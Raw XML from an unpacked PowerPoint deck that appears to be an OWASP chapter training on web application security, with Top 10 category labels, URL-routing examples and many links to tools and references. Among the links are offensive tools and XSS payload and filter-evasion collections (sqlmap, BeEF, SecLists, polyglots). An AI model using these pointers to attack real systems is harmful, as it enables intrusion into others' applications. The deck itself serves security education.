        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4717248" y="1864563"/>
        <a:ext cx="2142976" cy="1285785"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{59DD1C5D-599E-4CCD-9219-47AAF377CCFF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7074522" y="1864563"/>
          <a:ext cx="2142976" cy="1285785"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:hueOff val="-3472599"/>
            <a:satOff val="20921"/>
            <a:lumOff val="167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A8: Insecure Deserialization</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7074522" y="1864563"/>
        <a:ext cx="2142976" cy="1285785"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{05902CD6-3368-4AEF-857F-AE64CE7F66E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2359975" y="3364646"/>
          <a:ext cx="2142976" cy="1285785"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:hueOff val="-3968684"/>
            <a:satOff val="23910"/>
            <a:lumOff val="191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A9: </a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="0" lang="en-GB" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln/>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
            </a:rPr>
            <a:t>Using Components with Known Vulnerable </a:t>
          </a:r>
          <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
            <a:ln/>
            <a:effectLst/>
            <a:uLnTx/>
            <a:uFillTx/>
            <a:latin typeface="+mn-lt"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2359975" y="3364646"/>
        <a:ext cx="2142976" cy="1285785"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AB8EC8CA-2DD9-43B0-BAC8-DBF5D6A86196}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4717248" y="3364646"/>
          <a:ext cx="2142976" cy="1285785"/>
        </a:xfrm>
        <a:prstGeom prst="rect">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A10: Insufficient Logging &amp; Monitoring</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4717248" y="3364646"/>
        <a:ext cx="2142976" cy="1285785"/>
      </dsp:txXfrm>
    </dsp:sp>
  </dsp:spTree>
</dsp:drawing>
</file>

<file path=ppt/diagrams/layout1.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4F252-8629-47EA-87CE-773610201442}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/29/2019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57929-CF4F-4DE2-810B-014D27B8385A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194781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p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1031875" y="0"/>
            <a:ext cx="9029700" cy="5080000"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln cap="flat" algn="ctr"/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1723395" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln cap="flat" algn="ctr"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91405" rIns="91405"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A9 is the only new item in the top 10 for 2013.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282364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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="331992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50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363685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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2868137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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1984483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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867141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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="624308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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3660978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57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3592988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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1090034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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342157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28C82B-2139-4834-B89A-CBE18FC32C6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15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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1844580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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1657538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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4023530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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361339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79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2623598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 Controller (server-side SPA) uses a single server-side rendered page for all functionality:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>example.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index?action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AddToCard&amp;Item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page Controller uses a separate page for each function:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>example.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AddToCart?Item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Model View Controller (MVC) uses a routed URL structure to render server-side rendered content:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>example.com/Item/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AddToCard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Single Page Application (SPA) uses a single client-side rendered page and data calls for all functionality:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>example.com/#/Item/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AddToCard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/11</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{74257929-CF4F-4DE2-810B-014D27B8385A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1001754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Reflective is most basic and easiest to understand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simplest to discover</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118</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2291111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138</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1508380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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2639579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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="269195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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="763482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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="906518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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2221054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151</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2332360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152</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="728108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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1559464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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63487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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2288159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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75081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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21296288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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3109431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914400"/>
            <a:fld id="{52741FAB-DDC0-4C8D-A2C0-9BFAD0961D10}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:pPr defTabSz="914400"/>
              <a:t>3/29/2019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4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400"/>
            <a:fld id="{B213A299-4B70-44C0-9573-A40A0A56C89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357176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400"/>
            <a:fld id="{52741FAB-DDC0-4C8D-A2C0-9BFAD0961D10}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:pPr defTabSz="914400"/>
              <a:t>3/29/2019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400"/>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400"/>
            <a:fld id="{B213A299-4B70-44C0-9573-A40A0A56C89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978473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271073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9600" y="76200"/>
            <a:ext cx="6299200" cy="7159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41FAB-DDC0-4C8D-A2C0-9BFAD0961D10}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3/29/2019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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41516739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txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="2800" b="1"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tanprathan/OWASP-Testing-Checklist" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="Externa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s://digi.ninja/projects/cewl.php" TargetMode="Externa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danielmiessler/SecLists" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fuzzdb-project/fuzzdb" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide106.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sqlmapproject/sqlmap/wiki/Usage" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sqlmapproject/sqlmap" TargetMode="Externa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ithub.com/beefproject/beef/wiki/Installation" TargetMode="Externa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darrylmacleod.wordpress.com/2012/03/26/penetration-testing-report-templates/" TargetMode="External"/><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10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gchq.github.io/CyberChef/"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daringfireball.net/projects/markdown/dingus" TargetMode="Externa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s://xibuntu.markdeen.io/" TargetMode="Externa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www.syhunt.com/sandcat/" TargetMode="Externa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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/API/Document_Object_Model/Introduction" TargetMode="External"/><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xsshunter.com/" TargetMode="Externa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hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="Externa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owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Free_for_Open_Source_Application_Security_Tools" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Juice_Shop_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Mobile_Security_Project" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide13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hyperlink" Target="https://www.owasp.org/index.php/Double_Encoding" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/foospidy/payloads" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/XSS-WITH-CONTEXT-JHADDIX.txt" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://html5sec.org/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xsses.rocks/sample-page/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet"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github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot"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hyperlink" Target="https://github.com/jhaddix/XSS.png"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enkhee-osiris.github.io/Decoder-JSFuck/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.jsfuck.com/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image141.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:central-pennsylvania-chapter%2Bsubscribe@owasp.org" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Central_Pennsylvania#OWASP_Central_Pennsylvania" TargetMode="Externa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hyperlink" Target="https://github.com/nettitude/xss_payloads" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xss-payloads.com/payloads-list.html?c#category=capture" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14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developer.mozilla.org/en-US/docs/Web/API/Document_Object_Model/Introduction" TargetMode="Externa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14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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/dotnet/api/system.web.security.antixss.antixssencoder?view=netframework-4.7.2" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/images/0/07/Xenotix_XSS_Protection_CheatSheet_For_Developers.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project/Pages/Online" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://code.google.com/archive/p/domxsswiki/wikis/Introduction.wiki" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://xenotix.in/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/aspnet/core/security/cross-site-scripting?view=aspnetcore-2.1"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hyperlink" Target="https://hackerone.com/reports/106293" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/395944" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.it-securityguard.com/bugbounty-the-5000-google-xss/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://klikki.fi/adv/yahoo.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owasp.org/index.php/Membership" TargetMode="External"/><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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vulnerability-lab.com/list-of-bug-bounty-programs.php" TargetMode="Externa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hyperlink" 